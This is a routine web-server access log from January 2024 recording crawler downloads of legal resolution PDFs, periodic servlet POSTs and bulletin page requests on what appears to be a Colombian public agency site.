201.245.192.253 - - [17/Jan/2024:02:54:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:54:35 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [17/Jan/2024:02:54:36 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
172.22.2.4 - - [17/Jan/2024:02:54:47 -0500] "GET /BLA/boletinlegal/sitemap.xml HTTP/1.1" 404 1038
201.245.192.253 - - [17/Jan/2024:02:55:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
216.244.66.195 - - [17/Jan/2024:02:55:30 -0500] "GET /BLA/resoluciones/AUTOS%202007/0525.pdf HTTP/1.1" 200 185321
66.249.66.166 - - [17/Jan/2024:02:55:47 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 88416
66.249.66.166 - - [17/Jan/2024:02:55:50 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
201.245.192.253 - - [17/Jan/2024:02:55:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202007/0631.pdf HTTP/1.1" 200 83281
216.244.66.195 - - [17/Jan/2024:02:56:24 -0500] "GET /BLA/resoluciones/AUTOS%202007/0687.pdf HTTP/1.1" 200 226151
201.245.192.253 - - [17/Jan/2024:02:56:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202007/1180.pdf HTTP/1.1" 200 26421
216.244.66.195 - - [17/Jan/2024:02:57:16 -0500] "GET /BLA/resoluciones/AUTOS%202007/1221.pdf HTTP/1.1" 200 71819
216.244.66.195 - - [17/Jan/2024:02:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202007/1438.pdf HTTP/1.1" 200 27376
201.245.192.253 - - [17/Jan/2024:02:57:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:56:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [17/Jan/2024:02:58:01 -0500] "GET /BLA/resoluciones/AUTOS%202007/1472.pdf HTTP/1.1" 200 67748
216.245.221.92 - - [17/Jan/2024:02:58:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [17/Jan/2024:02:58:22 -0500] "GET /BLA/resoluciones/AUTOS%202007/1493.pdf HTTP/1.1" 200 42940
201.245.192.253 - - [17/Jan/2024:02:58:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:58:41 -0500] "GET /BLA/resoluciones/AUTOS%202007/1658.pdf HTTP/1.1" 200 162891
172.22.2.4 - - [17/Jan/2024:02:57:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
216.244.66.195 - - [17/Jan/2024:02:59:01 -0500] "GET /BLA/resoluciones/AUTOS%202007/1661.pdf HTTP/1.1" 200 285100
216.244.66.195 - - [17/Jan/2024:02:59:19 -0500] "GET /BLA/resoluciones/AUTOS%202007/1821.pdf HTTP/1.1" 200 29181
216.244.66.195 - - [17/Jan/2024:02:59:36 -0500] "GET /BLA/resoluciones/AUTOS%202009/0815.pdf HTTP/1.1" 200 72249
201.245.192.253 - - [17/Jan/2024:02:59:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:59:53 -0500] "GET /BLA/resoluciones/AUTOS%202009/1093.pdf HTTP/1.1" 200 103621
216.244.66.195 - - [17/Jan/2024:03:00:08 -0500] "GET /BLA/resoluciones/AUTOS%202009/1097.pdf HTTP/1.1" 200 85049
201.245.192.253 - - [17/Jan/2024:03:00:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
216.244.66.195 - - [17/Jan/2024:03:00:22 -0500] "GET /BLA/resoluciones/AUTOS%202009/1379.pdf HTTP/1.1" 200 123885
201.245.192.253 - - [17/Jan/2024:03:00:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:03:00:37 -0500] "GET /BLA/resoluciones/AUTOS%202009/1495.pdf HTTP/1.1" 200 186836
216.244.66.195 - - [17/Jan/2024:03:00:51 -0500] "GET /BLA/resoluciones/AUTOS%202018/0302.pdf HTTP/1.1" 200 266354
216.244.66.195 - - [17/Jan/2024:03:01:03 -0500] "GET /BLA/resoluciones/AUTOS%202018/0505.pdf HTTP/1.1" 200 266089
216.244.66.195 - - [17/Jan/2024:03:01:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/0851.pdf HTTP/1.1" 200 272804
216.244.66.195 - - [17/Jan/2024:03:01:36 -0500] "GET /BLA/resoluciones/AUTOS%202018/1166.pdf HTTP/1.1" 200 304418
216.244.66.195 - - [17/Jan/2024:03:01:51 -0500] "GET /BLA/resoluciones/AUTOS%202018/1847.pdf HTTP/1.1" 200 272927
201.245.192.253 - - [17/Jan/2024:03:01:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:03:02:04 -0500] "GET /BLA/resoluciones/AUTOS%202018/1863.pdf HTTP/1.1" 200 278831
52.167.144.67 - - [17/Jan/2024:03:02:11 -0500] "GET /robots.txt HTTP/1.1" 404 1049
216.244.66.195 - - [17/Jan/2024:03:02:16 -0500] "GET /BLA/resoluciones/AUTOS%202018/1927.pdf HTTP/1.1" 200 271616
52.167.144.185 - - [17/Jan/2024:03:02:20 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000011%20DEL%2023%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 334676
216.244.66.195 - - [17/Jan/2024:03:02:28 -0500] "GET /BLA/resoluciones/AUTOS%202018/3628.pdf HTTP/1.1" 200 278166
201.245.192.253 - - [17/Jan/2024:03:02:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:03:02:41 -0500] "GET /BLA/resoluciones/AUTOS%202018/4025.pdf HTTP/1.1" 200 236980
216.244.66.195 - - [17/Jan/2024:03:02:51 -0500] "GET /BLA/resoluciones/AUTOS%202018/4119.pdf HTTP/1.1" 200 250661
